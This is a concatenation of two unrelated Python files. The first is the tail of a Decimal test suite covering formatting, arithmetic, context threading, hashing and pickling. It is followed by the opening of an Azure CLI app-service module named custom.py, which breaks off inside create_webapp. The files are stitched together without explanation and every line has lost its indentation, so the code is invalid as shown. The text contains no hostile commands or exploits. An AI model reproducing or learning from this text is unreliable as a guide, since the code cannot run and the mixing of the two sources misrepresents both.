('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# check alignment
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class DecimalArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
for x, y in [(n, n), (n, i), (i, n), (n, f), (f, n),
(s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)]:
self.assert_(x != y)
self.assert_(not (x == y))
self.assert_(not (x < y))
self.assert_(not (x <= y))
self.assert_(not (x > y))
self.assert_(not (x >= y))
# The following are two functions used to test threading in the next class
def thfunc1(cls):
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.synchro.wait()
test2 = d1/d3
cls.finish1.set()
cls.assertEqual(test1, Decimal('0.3333333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.3333333333333333333333333333'))
return
def thfunc2(cls):
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.3333333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
return
class DecimalUseOfContextTest(unittest.TestCase):
'''Unit tests for Use of Context cases in Decimal.'''
try:
import threading
except ImportError:
threading = None
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
#Test the "threading isolation" of a Context.
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
return
if threading is None:
del test_threading
class DecimalUsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.failUnless(dc > da)
self.failUnless(dc >= da)
self.failUnless(da < dc)
self.failUnless(da <= dc)
self.failUnless(da == db)
self.failUnless(da != dc)
self.failUnless(da <= db)
self.failUnless(da >= db)
self.assertEqual(cmp(dc,da), 1)
self.assertEqual(cmp(da,dc), -1)
self.assertEqual(cmp(da,db), 0)
#a Decimal and an int
self.failUnless(dc > 23)
self.failUnless(23 < dc)
self.failUnless(dc == 45)
self.assertEqual(cmp(dc,23), 1)
self.assertEqual(cmp(23,dc), -1)
self.assertEqual(cmp(dc,45), 0)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = map(Decimal, xrange(100))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
# with None
self.assertFalse(Decimal(1) < None)
self.assertTrue(Decimal(1) > None)
def test_copy_and_deepcopy_methods(self):
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
#just that it's hashable
hash(Decimal(23))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hash(value), hash(int(value)))
#the same hash that to an int
self.assertEqual(hash(Decimal(23)), hash(23))
self.assertRaises(TypeError, hash, Decimal('NaN'))
self.assert_(hash(Decimal('Inf')))
self.assert_(hash(Decimal('-Inf')))
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
c = getcontext()
old_precision = c.prec
x = Decimal("123456789.1")
c.prec = 6
h1 = hash(x)
c.prec = 10
h2 = hash(x)
c.prec = 16
h3 = hash(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = old_precision
def test_min_and_max_methods(self):
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.failUnless(min(d1,d2) is d1)
self.failUnless(min(d2,d1) is d1)
self.failUnless(max(d1,d2) is d2)
self.failUnless(max(d2,d1) is d2)
#between Decimal and long
self.failUnless(min(d1,l2) is d1)
self.failUnless(min(l2,d1) is d1)
self.failUnless(max(l1,d2) is d2)
self.failUnless(max(d2,l1) is d2)
def test_as_nonzero(self):
#as false
self.failIf(Decimal(0))
#as true
self.failUnless(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
# result type of string methods should be str, not unicode
unicode_inputs = [u'123.4', u'0.5E2', u'Infinity', u'sNaN',
u'-0.0E100', u'-NaN001', u'-Inf']
for u in unicode_inputs:
d = Decimal(u)
self.assertEqual(type(str(d)), str)
self.assertEqual(type(repr(d)), str)
self.assertEqual(type(d.to_eng_string()), str)
def test_tonum_methods(self):
#Test float, int and long methods.
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#long
self.assertEqual(long(d1), 66)
self.assertEqual(long(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
def test_eval_round_trip(self):
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
#inf
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
#coefficient in infinity should be ignored
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_immutability_operations(self):
# Do operations and check that it didn't change change internal objects.
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
return
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__div__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__long__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__nonzero__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdiv__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_subclassing(self):
# Different behaviours when subclassing Decimal
class MyDecimal(Decimal):
pass
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertTrue(type(d) is Decimal)
d = d1.max(d2)
self.assertTrue(type(d) is Decimal)
def test_implicit_context(self):
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
class DecimalPythonAPItests(unittest.TestCase):
def test_abc(self):
self.assert_(issubclass(Decimal, numbers.Number))
self.assert_(not issubclass(Decimal, numbers.Real))
self.assert_(isinstance(Decimal(0), numbers.Number))
self.assert_(not isinstance(Decimal(0), numbers.Real))
def test_pickle(self):
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
def test_int(self):
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
def test_trunc(self):
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
class ContextAPItests(unittest.TestCase):
def test_pickle(self):
c = Context()
e = pickle.loads(pickle.dumps(c))
for k in vars(c):
v1 = vars(c)[k]
v2 = vars(e)[k]
self.assertEqual(v1, v2)
def test_equality_with_other_types(self):
self.assert_(Decimal(10) in ['a', 1.0, Decimal(10), (1,2), {}])
self.assert_(Decimal(10) not in ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
class WithStatementTest(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(orig_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(set_ctx.prec == new_ctx.prec, 'did not set correct context')
self.assert_(new_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
context = Context(prec=9, Emin = -999999999, Emax = 999999999,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-1000000009")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
context._raise_error(flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort()
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort()
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_main(arith=False, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init()
global TEST_ALL, DEBUG
TEST_ALL = arith or is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = [
DecimalExplicitConstructionTest,
DecimalImplicitConstructionTest,
DecimalArithmeticOperatorsTest,
DecimalFormatTest,
DecimalUseOfContextTest,
DecimalUsabilityTest,
DecimalPythonAPItests,
ContextAPItests,
DecimalTest,
WithStatementTest,
ContextFlags
]
else:
test_classes = [DecimalTest]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(DecimalTest, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
import decimal as DecimalModule
run_doctest(DecimalModule, verbose)
finally:
setcontext(ORIGINAL_CONTEXT)
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.util import get_az_user_agent, send_raw_request, get_file_json
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (InvalidArgumentValueError, MutuallyExclusiveArgumentError, ResourceNotFoundError,
RequiredArgumentMissingError, ValidationError, CLIInternalError,
UnclassifiedUserFault, AzureResponseError, AzureInternalError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_tier,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager, use_additional_properties, get_app_service_plan_from_webapp,
get_resource_if_exists)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_KEYS, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX,
FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH,
DOTNET_RUNTIME_NAME, NETCORE_RUNTIME_NAME, ASPDOTNET_RUNTIME_NAME, LINUX_OS_NAME,
WINDOWS_OS_NAME)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None, https_only=False):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise ResourceNotFoundError("The plan '{}' doesn't exist in the resource group '{}".format(plan,
resource_group_name))
is_linux = plan_info.reserved
helper = _StackRuntimeHelper(cmd, linux=is_linux, windows=not is_linux)
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise ValidationError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise ValidationError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
if using_webapp_up:
https_only = using_webapp_up
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=https_only, virtual_network_subnet_id=subnet_resource_id)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
